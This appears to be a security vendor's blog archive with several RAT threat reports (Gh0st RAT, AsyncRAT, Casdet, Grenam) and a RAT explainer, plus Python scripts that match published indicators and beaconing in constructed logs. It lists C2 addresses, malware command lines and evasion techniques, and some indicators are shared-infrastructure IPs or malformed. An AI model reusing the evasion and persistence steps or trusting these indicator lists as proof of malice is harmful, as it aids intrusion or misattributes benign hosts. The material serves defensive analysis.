RAT Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Last updated: Mon, 29 Jul 2024 20:40:03 +0000

Gh0st RAT Malware Attacks Chinese Users Via Fake Chrome Page
https://gridinsoft.com/blogs/ghost-rat-attacks-chinese-users/
Mon, 29 Jul 2024 20:38:38 +0000

Attackers are using a new loader, Gh0stGambit, to spread Gh0st RAT malware to Chinese users. A Google Chrome phishing download site is being used for that purpose, copying the design of the genuine page. That is, in fact, the part of the campaign that attracted the attention of cybersecurity experts.

Gh0st RAT Trojan Targets Chinese Windows Users

In early June, cybersecurity researchers discovered a malicious campaign targeting users in China. Threat actors are spreading Gh0st RAT using the malware dropper Gh0stGambit, which reaches user devices through the phishing site chrome-web[.]com. The attackers employed a drive-by download: they offered users a Google Chrome installer on a page that looked like the legitimate Chrome download site. However, the MSI installer downloaded from the fake site contains two files: the legitimate Chrome installation executable and the malicious installer WindowsProgram.msi, which executes shellcode responsible for downloading Gh0stGambit.

Fake Chrome download page (Source: eSentire)

Gh0st RAT is a long-standing piece of malware from the arsenal of APT27, with its source code made publicly available in 2008. According to sources, its command infrastructure was primarily based in the People’s Republic of China. Written in C++, it has appeared in various forms over the years, primarily in campaigns run by China-linked cyber espionage groups. Researchers report that a modified variant of Gh0st RAT was used in APT27 campaigns in 2018.

Some Details

The attack itself unfolds in several stages. Before carrying out its primary task, Gh0stGambit checks the system for anti-malware software such as Microsoft Defender or 360 SafeGuard. If it detects these programs, it adds its own folder to their exclusions. It then connects to a command and control server at hxxp://pplilv.bond/d4/107.148.73[.]225/reg32 and initiates the download of Gh0st RAT.

Gh0st RAT is delivered in encrypted form disguised as a Registry Workshop. In addition to providing remote access, it can collect information (keylogging, screen capturing, etc.). Moreover, it contains an embedded rootkit that allows it to hide certain system elements, such as the registry or directories.

It can also drop Mimikatz into the system folder, enable RDP on compromised hosts, gain access to account identifiers associated with Tencent QQ, clear Windows event logs, and erase data from 360 Secure Browser, QQ Browser, and Sogou Explorer.

It is rather unusual to see malware of allegedly Chinese origin attacking users in mainland China. Typically, threat actors keep away from attacking anything or anyone within their own country, as it makes the distance to law enforcement too short. The thing is, this is not just regular malware but a toolkit for spying on citizens, and APT27 was earlier seen doing exactly this to Chinese citizens, both on the mainland and in Taiwan.

How to protect your system?

Protecting against such staged, multi-component attacks requires advanced security software. Aside from excellent real-time and database-backed protection, it should also feature a network protection system that can filter out phishing sites like the one used in this campaign. All this is available in GridinSoft Anti-Malware; check it out through the banner below.

AsyncRAT Spreads As Fake eBook Files, Uses LNK Files
https://gridinsoft.com/blogs/asyncrat-spreads-as-fake-ebook-files/
Wed, 10 Jul 2024 21:15:46 +0000

Recent research uncovers a new spreading campaign of AsyncRAT that targets users who download electronic books. The reviewed campaign targets those looking for a specific book, originally available as a paid workbook on different platforms. Tricked into clicking on the downloaded file, people in fact trigger malware installation.

AsyncRAT Spreads in Fake eBook Files

The latest spreading campaign of AsyncRAT was described in detail by ASEC analysts. Fraudulent actors publish what looks like a download link for an archive containing the desired book. As I’ve mentioned, the specific book this website offers is not free, which adds even more to the temptation for a user. After hitting the download button, they see a genuine-looking file and click it, hoping to open the book.

Fake eBook file: its actual contents are a script that runs the payload

But despite the expectation, nothing will ever happen. This file is made only to look like an ebook; it is in fact a disguised compressed file that triggers the chain of malicious events. Should the user click on it, the file executes its script, launching a multi-stage malware loader. All the resources needed for the attack (except the final payload) are stored in this very fake ebook file.

AsyncRAT files: malware files kept inside the “ebook file”

The first thing launched is a PowerShell script that initially checks the system for antivirus software. Then it starts working with the files in the archive, which only look like video files: in fact, they merely carry video extensions and are VBS scripts under the bonnet. The first of these scripts collects system information and runs another VBS file that eventually downloads AsyncRAT from the command server. That script creates another task in the Scheduler and executes the final payload.

What is AsyncRAT?

AsyncRAT is an open-source remote access tool that first appeared publicly in 2019. For obvious reasons, it is often weaponized by malicious actors. Even in its original design, it is a powerful toolkit for remote access and administration, using encrypted connections during the session. AsyncRAT is capable of logging keystrokes, sending remote commands, controlling the attacked system and deploying malware.

As the source code is freely available, it is nearly impossible to trace a specific cybercrime gang that uses it in their attacks. In fact, AsyncRAT appears both in attacks on individuals and in high-profile cyberattacks led by state-sponsored actors. Its open-source nature also adds to the flexibility of the payload: operators can alter pretty much anything, from functionality and detection evasion to capabilities for delivering other malware. This is what makes not only AsyncRAT, but any open-source malware exceptionally dangerous.

How to protect against malware?

To stop an obfuscated malware spreading campaign like the one I’ve described above, I recommend using GridinSoft Anti-Malware. Its multi-component detection system will stop the attack even before the malicious file reaches the system, thanks to its superior online protection module.

Trojan:Win32/Casdet!rfn
https://gridinsoft.com/blogs/trojan-win32-casdet-rfn/
Thu, 27 Jun 2024 14:33:20 +0000

Trojan:Win32/Casdet!rfn is a detection that indicates the possible presence of malware on your system. Users may encounter this detection after using pirated software or opening suspicious email attachments. In certain cases, Casdet may be a false positive detection.

Casdet is a severe threat mainly used for reconnaissance and delivering other payloads to the device. It also collects some data about the system but can be modified for different tasks, such as direct information theft.

Trojan:Win32/Casdet!rfn Overview

Trojan:Win32/Casdet!rfn is a detection that Microsoft Defender mainly uses for remote access trojans (RATs). Such malware, as its name implies, provides remote access and is often used for reconnaissance and delivery of other malware. Casdet doesn’t usually collect a lot of information, but the payload it carries is what does the most damage. Aside from this, Casdet has a modular structure, which allows it to dynamically plug in modules it needs and act as an information stealer, for example.

Trojan:Win32/Casdet!rfn detection alert (screenshot)

Trojan:Win32/Casdet!rfn is usually spread via phishing emails and via cracked software distributed through p2p networks. Rarely, though, it can turn out to be a false positive, marking a legitimate file as malicious. Some users have complained about Trojan:Win32/Casdet!rfn detections after downloading and installing a legitimate Android emulator, e-books, or game mods. Let’s take a detailed look at how this malware works.

Detailed Analysis

First, let’s remember how a Remote Access Trojan (RAT) works. In general, RATs collect sensitive data and can be used for various purposes, including espionage and remote control of compromised devices. However, Casdet!rfn in general, and the sample I was reviewing in particular, mostly works as a malware downloader. Let’s break down its actions step by step.

Initial Access

The sample of the Casdet Trojan picked for this test reached the victim’s device through phishing emails. In some rare cases, hackers picked a victim and tailored the emails to that specific person. The threat, or its loader, usually hides within the attached file, while the message body motivates the victim to run the attachment, lulling their vigilance.

Execution, Detection Evasion & Fingerprinting

Trojan:Win32/Casdet!rfn employs various techniques to evade detection by security systems. These techniques include obfuscation and checks for virtual machines or debuggers. The latter is done by listing the processes and checking registry keys that can contain information about the environment, such as the one below. Detection evasion, on the other hand, mostly relies on packing and obfuscation; the only trick the malware pulls during execution is idling for several minutes at the start.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache

Additionally, it performs so-called geofencing by checking the language packs installed in the system. That’s a rather common tactic across different malware families, as the developers try to avoid attacking anything from their own country. Below, you can see the specific registry keys it scans for this.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
HKCU\Software\Classes\Local Settings\MuiCache\130\52C64B7E\LanguageList

When malware infiltrates a system, it aims to establish persistence to ensure its continued operation and control. It abuses WerFault through the command I’ve pasted below to gain persistence and additional execution privileges. This allows it to maintain a foothold in the system even after reboots or security scans.

C:\Windows\system32\WerFault.exe -u -p 3560 -s 216

After these operations, Casdet collects basic information about the system. This fingerprint is unique to each system and serves to identify it; while it contains no valuable or sensitive data, it is sent to the C2.

  • OS version
  • Username
  • CPU and GPU
  • IP address
  • Display size
  • Device vendor
  • Installed software
  • Network information

C2 Communications

The way Casdet malware communicates with the command server is nothing special. It carries a selection of IP addresses in its binary file and decodes them when the time comes. Then it forms an HTTP POST request, encrypts it, and sends it to the command server.

  • 20.99.133.109:443
  • 20.99.186.246:443
  • 23.216.147.64:443
  • 192.229.211.108:80
  • 20.99.185.48:443
  • 104.80.88.11:443
  • 23.216.147.76:443
  • 20.99.184.37:443

In response, the C2 sends a tiny blob of information that contains further instructions for the malware. Among them are uploading a specific file from the infected machine, executing a command, or connecting to a remote server to pull the payload and run it. All the supplementary info comes in the same response package.

Payload

Regarding payloads, this is where Trojan:Win32/Casdet!rfn shines: it can deploy literally any malware type. Most of the time, though, Casdet delivers ransomware, spyware, droppers and similar things. It runs the DllMain function from a DLL file in the user’s temporary folder using the rundll32.exe utility. DllMain is the entry point the loader calls when the DLL is loaded or unloaded, with reason codes such as DLL_PROCESS_ATTACH and DLL_PROCESS_DETACH.

"C:\Windows\System32\rundll32.exe" C:\Users\A4148~1.MON\AppData\Local\Temp\e8442b7f12ab7cb616c549181d39c10b.dll,DllMain

At the same time, Casdet has a modular structure, which allows it to act standalone when needed. This sample in particular was capable of acquiring infostealer functionality or extending its dropper functions. On top of its default capabilities, this makes a single sample of Casdet capable of performing a full-fledged cyberattack.

How To Remove Trojan:Win32/Casdet!rfn?

To remove Trojan:Win32/Casdet!rfn, I recommend using GridinSoft Anti-Malware. This program is resilient to the anti-detection techniques this malware uses, thanks to its multi-component detection system.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Virus:Win32/Grenam.VA!MSR
https://gridinsoft.com/blogs/virus-win32-grenam-va-msr/
Thu, 27 Jun 2024 12:38:57 +0000

Virus:Win32/Grenam.VA!MSR is a type of malware that can stealthily get into the system and establish remote connections. It allows attackers to access the system and remotely perform keylogging and information-gathering functions. This malware usually spreads through fake software downloads and on compromised websites.

Viruses like Grenam can be disguised as legitimate software. The specific capabilities and behaviors of the malware may differ depending on the variant. However, it is commonly associated with the delivery of other malicious software, making it a severe threat to the security and privacy of computer systems.

Virus:Win32/Grenam.VA!MSR Overview

Virus:Win32/Grenam.VA!MSR is a generic detection name used by Microsoft Defender Antivirus to identify a type of malware that belongs to the Grenam family. This family consists of backdoors and Remote Access Trojans (RATs). These types of malware are designed to provide unauthorized remote access to a target system. They are used to steal sensitive data, install malicious software, or cause other damage.

Virus:Win32/Grenam.VA!MSR detection window (screenshot)

Grenam malware can infiltrate a system through various methods, but the most common ones include malicious advertising and pirated software. Once the malware is installed, it uses anti-analysis and defense evasion features to avoid detection by antivirus programs. As a result, it can remain undetected on a system for long periods, opening the door to more dangerous malware.

Technical Analysis

Let’s look at one of the Virus:Win32/Grenam.VA!MSR samples to understand how it works. Once the malware enters the system, it executes initial dropper files such as C:\DllLoader.exe and C:\Documents and Settings\\Application Data\Ground.exe. Next, the malware uses script hosts such as Windows Script Host or PowerShell, invoked with command-line arguments, to run further scripts. It also drops and executes binary files with absolutely meaningless names, like b013bf6f928a3bf40678e87d9da48f161e2e30908f98c78dfa9f2bd8cf3814d2.exe.

Moreover, some users report that their desktop wallpaper was changed after detecting this malware.

Screenshot of the changed wallpaper: the text sits on the bottom left of the laptop’s wallpaper.

Establishing Persistence

To ensure continuity and maintain a persistent presence on the infected machine, it requests the following privilege through a WinAPI call:

SE_LOAD_DRIVER_PRIVILEGE

The malware may exploit system vulnerabilities or use stolen credentials to gain higher privileges necessary for deeper system access and modification. The malware often manipulates other system settings or uses exploits to elevate privileges.

After finishing with persistence, Grenam starts rummaging through registry keys to collect info about the system. It mainly concentrates on data like CPU, display resolution, installed programs, etc., without getting into user data.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Defense Evasion

To evade detection by antivirus software and system monitoring tools, the malware employs techniques such as obfuscating its files and operations, hiding windows, and masquerading its processes. It also uses XOR and RC4 to encode data, modifies file attributes, and renames its files with misleading extensions.

The registry keys listed above store advanced Windows Explorer settings (hidden files, file extensions, and title bar paths), system-wide policies affecting user accounts, rights, security options, and system behavior, information on system services, and Shell Execute Hooks that modify Windows Shell behavior.

Command and Control

Finally, once it has the required access and control, the malware can execute actions as directed by its operators, including data exfiltration, further infections, or using the host for additional attacks. The malware opens backdoors and communicates over TCP and UDP with external servers at known-bad IPs to establish control.

TCP 23.216.147.62:443
TCP 23.216.147.64:443
UDP a83f:8110:4170:706c:6963:6174:696f:6e50:53

This is a clear indicator of C2 activity. The malware infects other executable files or uses network connections to spread to additional systems within the network environment. It infects files and possibly uses network drives to spread itself.
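The C2 endpoints above, together with the indicators in the Casdet write-up earlier on this page (its C2 list, the WerFault command line and the rundll32 ...,DllMain payload launch from a user's Temp folder), are the kind of artefacts a defender turns into a host-telemetry check. The following Python script is an added example, not code from the Gridinsoft posts or from GridinSoft's product: the log format, the sample lines, the `Finding` structure and the scoring weights are constructed assumptions for this example, while the IP:port values and command-line shapes are taken from the two write-ups. WerFault is scored as a weak signal, because Windows itself launches WerFault.exe with `-u -p <pid> -s <handle>` for ordinary crash reporting.

```python
"""Indicator scan for the Casdet and Grenam artefacts quoted on this page.

Added example; not the Gridinsoft authors' tooling. The log format and all
sample lines are constructed. Only the IP:port pairs, the WerFault argument
shape and the rundll32 ...,DllMain pattern come from the two write-ups.
"""
import re
from dataclasses import dataclass

# C2 endpoints listed in the Trojan:Win32/Casdet!rfn post.
CASDET_C2 = frozenset({
    "20.99.133.109:443", "20.99.186.246:443", "23.216.147.64:443",
    "192.229.211.108:80", "20.99.185.48:443", "104.80.88.11:443",
    "23.216.147.76:443", "20.99.184.37:443",
})
# TCP endpoints listed in the Virus:Win32/Grenam.VA!MSR post (the UDP entry
# there is not a parseable address, so it is left out).
GRENAM_C2 = frozenset({"23.216.147.62:443", "23.216.147.64:443"})

# rundll32 calling DllMain on a DLL sitting in a user's Temp folder
# (Casdet payload stage). Any user name and any DLL name match.
RUNDLL32_TEMP_DLLMAIN = re.compile(
    r'rundll32\.exe"?\s+\S*\\AppData\\Local\\Temp\\[^,\s]+\.dll,DllMain',
    re.IGNORECASE,
)
# WerFault.exe -u -p <pid> -s <handle>, the shape quoted in the Casdet post.
# Windows spawns WerFault this way for normal crash reporting, so this is only
# a weak, corroborating signal and is weighted accordingly.
WERFAULT_UPS = re.compile(r"WerFault\.exe\s+-u\s+-p\s+\d+\s+-s\s+\d+", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    families: tuple   # write-up(s) the indicator belongs to
    reason: str
    weight: int       # 3 = strong indicator, 1 = weak / corroborating


def families_for_endpoint(endpoint: str) -> tuple:
    """Return the families whose published C2 list contains endpoint."""
    fams = []
    if endpoint in CASDET_C2:
        fams.append("Casdet")
    if endpoint in GRENAM_C2:
        fams.append("Grenam")
    return tuple(fams)


def scan_lines(lines):
    """Scan constructed '<ts> <event> <detail>' lines and return Findings.

    Events: 'ProcessCreate <command line>' and 'NetworkConnect <proto> <ip:port>'.
    Malformed lines are skipped rather than raising.
    """
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue
        _ts, event, detail = parts
        if event == "NetworkConnect":
            fields = detail.split()
            if len(fields) != 2:
                continue
            proto, endpoint = fields
            fams = families_for_endpoint(endpoint)
            if fams:
                findings.append(Finding(n, fams, f"{proto} connection to listed C2 {endpoint}", 3))
        elif event == "ProcessCreate":
            if RUNDLL32_TEMP_DLLMAIN.search(detail):
                findings.append(Finding(n, ("Casdet",), "rundll32 DllMain on DLL in user Temp", 3))
            if WERFAULT_UPS.search(detail):
                findings.append(Finding(n, ("Casdet",), "WerFault -u -p -s invocation (weak)", 1))
    return findings


def score(findings):
    """Sum indicator weights per family; a host scoring >= 3 is worth triage."""
    totals = {}
    for f in findings:
        for fam in f.families:
            totals[fam] = totals.get(fam, 0) + f.weight
    return totals


# Constructed sample telemetry (not real logs); 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    r'2024-06-27T10:00:01Z ProcessCreate "C:\Windows\System32\svchost.exe" -k netsvcs',
    r'2024-06-27T10:00:05Z ProcessCreate C:\Windows\system32\WerFault.exe -u -p 3560 -s 216',
    r'2024-06-27T10:00:09Z NetworkConnect tcp 20.99.133.109:443',
    r'2024-06-27T10:00:12Z ProcessCreate "C:\Windows\System32\rundll32.exe" C:\Users\A4148~1.MON\AppData\Local\Temp\e8442b7f12ab7cb616c549181d39c10b.dll,DllMain',
    r'2024-06-27T10:00:20Z NetworkConnect tcp 23.216.147.64:443',
    r'2024-06-27T10:00:25Z NetworkConnect tcp 192.0.2.10:443',
    r'2024-06-27T10:00:30Z ProcessCreate rundll32.exe shell32.dll,Control_RunDLL',
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: {'/'.join(h.families)} - {h.reason}")
    print("scores:", score(hits))
```

Note that the endpoint 23.216.147.64:443 appears in both write-ups, so a single connection to it is attributed to both families; an IP shared across unrelated families like this is usually shared hosting or a CDN edge and deserves a second look before it is treated as proof of either.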

How To Remove Virus:Win32/Grenam.VA!MSR?

If you are struggling with Virus:Win32/Grenam.VA!MSR, I suggest using GridinSoft Anti-Malware. This software has advanced features that can effectively find and neutralize malware from your system. In addition to removing existing threats, this solution provides long-term protection to prevent unwanted effects from other malware.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Remote Access Trojan (RAT)
https://gridinsoft.com/blogs/remote-access-trojan-meaning/
Thu, 16 May 2024 02:11:57 +0000

A Remote Access Trojan is software that allows unauthorized access to a victim’s computer or covert surveillance. Remote Access Trojans are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs along with a legitimate program, e.g., inside hacked games from torrents or within an email attachment. Once an attacker compromises the host system, they can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, a RAT can be deployed as a payload using exploit kits. Once successfully deployed, the RAT connects directly to the command-and-control (C&C) server the attackers control. It achieves this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

Remote access trojan mechanism

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker gains a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, the RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Is a Remote Access Trojan Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. To do so, they gained remote access to a computer authenticated to the SCADA (supervisory control and data acquisition) machines that controlled the country’s utility infrastructure. In addition, the Remote Access Trojan allowed attackers to access sensitive resources through the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to a threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
  • Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
  • Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.
  • Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.
  • Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

NjRAT is probably the best known and the oldest among remote-access trojans. It appeared in 2012 and keeps getting updates that adjust its functionality to modern “standards”, which accounts for its longevity. The reason for this is probably the attention from state-sponsored threat actors, APT36 and APT41, who have used it in cyberattacks almost since its very inception.

Interface of njRAT 0.7 Golden edition (screenshot)

The key functionality of njRAT is typical for pretty much any remote-access trojan: providing remote access. On top of that, it can upload and download files on command, log keystrokes, and capture microphone and camera input. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses the Mimikatz password stealer to authenticate via pass-the-hash, reusing operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting industrial control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly, also called Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, its developers released two significant versions of the RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and anti-forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan that runs in the background and stealthily collects information about the system, logged-in users, and network activity. It was first identified in 2011 and is still in active use today. It provides complete administrative control over infected devices: for example, it can disable Task Manager, the firewall, or User Account Control (UAC) on Windows machines. Dark Comet also encrypts its traffic and payload, which hinders antivirus detection.

AlienSpy

AlienSpy is a multi-platform RAT that can generate payloads for Windows, Linux, Mac OS X, and Android. It collects information about the target system, activates the webcam, and connects to its C&C server over an encrypted channel, giving the operator complete control over the device. AlienSpy also uses anti-analysis techniques to detect whether it is running in a virtual machine. According to the researcher who analyzed the threat, the operator of the service is a native Spanish speaker, probably from Mexico.

Heseber BOT

The Heseber BOT is built on the traditional VNC remote access tool. It uses VNC to control the target device remotely and to transfer data to the C&C server. It does not grant administrative access to the machine unless the logged-in user already has such permissions. Because VNC is a legitimate tool, antivirus products often do not flag Heseber as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows released in 1998. It supports most Windows versions from Windows 95 onwards and is deployed as a server on the target device. It has a small footprint, comes with a GUI client, and gives an attacker complete control over the system; one client can manage several infected machines at once. The server communicates with its client over TCP or UDP, usually on port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on stealth. Once one is in place you will likely struggle to detect it, even when the sample itself is not new. That is why the best protection against a Remote Access Trojan is to never give it a chance to run. The following measures are proactive steps that substantially reduce the chance of malware getting in and of the trouble that follows.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Any strategy for defending against RATs therefore depends on organization-wide security training. Victims usually launch this malware themselves, through infected attachments and links in phishing campaigns, so employees must be vigilant not to accidentally compromise the company network and jeopardize the entire organization.

Using multi-factor authentication (MFA)

Since RATs typically try to steal usernames and passwords for online accounts, MFA limits the damage when a person's credentials are compromised. Its main advantage is an additional layer of verification: if one factor, such as the user's password, is stolen, the other factors still stand between the attacker and the account. Note the limit of this protection: a RAT running on the endpoint can still abuse sessions the user has already authenticated from that machine, so MFA mainly stops stolen credentials from being reused elsewhere.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization's network. With strict access controls, however, you can limit the consequences of compromised credentials. Stricter rules include:

  • Tighter firewall rules, including filtering of outbound (egress) traffic
  • Allow-listing IP addresses for authorized users
  • Using more advanced antivirus and endpoint protection solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential entry point for a RAT. To minimize the attack surface, allow remote access only through secure connections established via VPNs or security gateways. A clientless remote access solution is another option: it requires no additional plug-ins or software on end-user devices, which are themselves targets for attackers.

Zero-trust security technologies

Zero-trust security models have grown in popularity because they follow the "never trust, always verify" principle. Instead of granting full network access, the zero-trust approach offers precise control over lateral movement. This is critical for containing RAT attacks, since attackers move laterally to infect other systems and reach sensitive data.

Focus on infection vectors

Like other malware, a Remote Access Trojan is only a threat once it is installed and running on the target computer. Secure browsing, anti-phishing solutions, and prompt patching of systems minimize the likelihood of a RAT infection. These measures are good practice for security in general, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans: they present themselves as legitimate applications but carry malicious functionality alongside, or instead of, what the application claims to do. Monitoring applications and the system for abnormal behavior (unexpected child processes, new autorun entries, outbound connections from programs that have no reason to make them) can reveal the signs of a Remote Access Trojan.

Monitoring network traffic

An attacker controls an infected computer through the RAT over the network, so a RAT on a local device has to communicate with a remote C&C server. Pay attention to unusual outbound traffic: regular check-ins to an unfamiliar host, connections on uncommon ports, or HTTP POSTs from processes that should not be making them. Egress filtering, an intrusion detection system or next-generation firewall, and proxy or DNS logs are the right tools here. A web application firewall is not: it protects your own web applications from inbound attacks and never sees a RAT's outbound C&C traffic.
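As an added example (not code from the Gridinsoft post or any vendor), here is a small Python beacon detector that applies the idea above to connection logs. It assumes a constructed log format of one line per outbound connection (epoch timestamp, source, destination, port, bytes out); the sample lines are made up, with one host checking in with the same destination roughly every minute next to ordinary, irregular web traffic.

```python
# Beacon detection over outbound connection logs.
# Added example for this article, not code from Gridinsoft or any vendor.
# Assumed (constructed) log format, one connection per line:
#   <epoch_seconds> <src_ip> <dst_ip> <dst_port> <bytes_out>
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 checks in with 203.0.113.7:8080 roughly every
# 60 s (RAT-like) and also talks to a web host at irregular times (user-like).
SAMPLE_LOG = """\
1700000000 10.0.0.5 203.0.113.7 8080 412
1700000011 10.0.0.5 198.51.100.20 443 2048
1700000059 10.0.0.5 203.0.113.7 8080 415
1700000120 10.0.0.5 203.0.113.7 8080 411
1700000133 10.0.0.5 198.51.100.20 443 15360
1700000181 10.0.0.5 203.0.113.7 8080 414
1700000240 10.0.0.5 203.0.113.7 8080 412
1700000290 10.0.0.5 198.51.100.20 443 900
1700000299 10.0.0.5 203.0.113.7 8080 413
1700000361 10.0.0.5 203.0.113.7 8080 416
1700000780 10.0.0.5 198.51.100.20 443 5000
"""


def parse_log(text):
    """Parse the constructed log format into (ts, src, dst, port, bytes) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, nbytes = line.split()
        records.append((int(ts), src, dst, int(port), int(nbytes)))
    return records


def find_beacons(records, min_connections=5, max_cv=0.15):
    """Return flows whose inter-connection gaps are suspiciously regular.

    A flow is a (src, dst, port) tuple. For each flow with at least
    min_connections entries we compute the gaps between consecutive
    connections and their coefficient of variation (stdev / mean). A RAT
    sleeping a fixed interval between check-ins yields a CV near 0; a human
    browsing yields a CV well above 0.5. Thresholds are assumptions; tune
    them against your own baseline.
    """
    flows = defaultdict(list)
    for ts, src, dst, port, nbytes in records:
        flows[(src, dst, port)].append((ts, nbytes))

    hits = []
    for (src, dst, port), events in flows.items():
        if len(events) < min_connections:
            continue
        events.sort()
        gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append({
                "src": src, "dst": dst, "port": port,
                "connections": len(events),
                "mean_interval": avg, "interval_cv": cv,
                # Near-constant payload sizes are a second beacon tell.
                "bytes_stdev": pstdev([nb for _, nb in events]),
            })
    return hits


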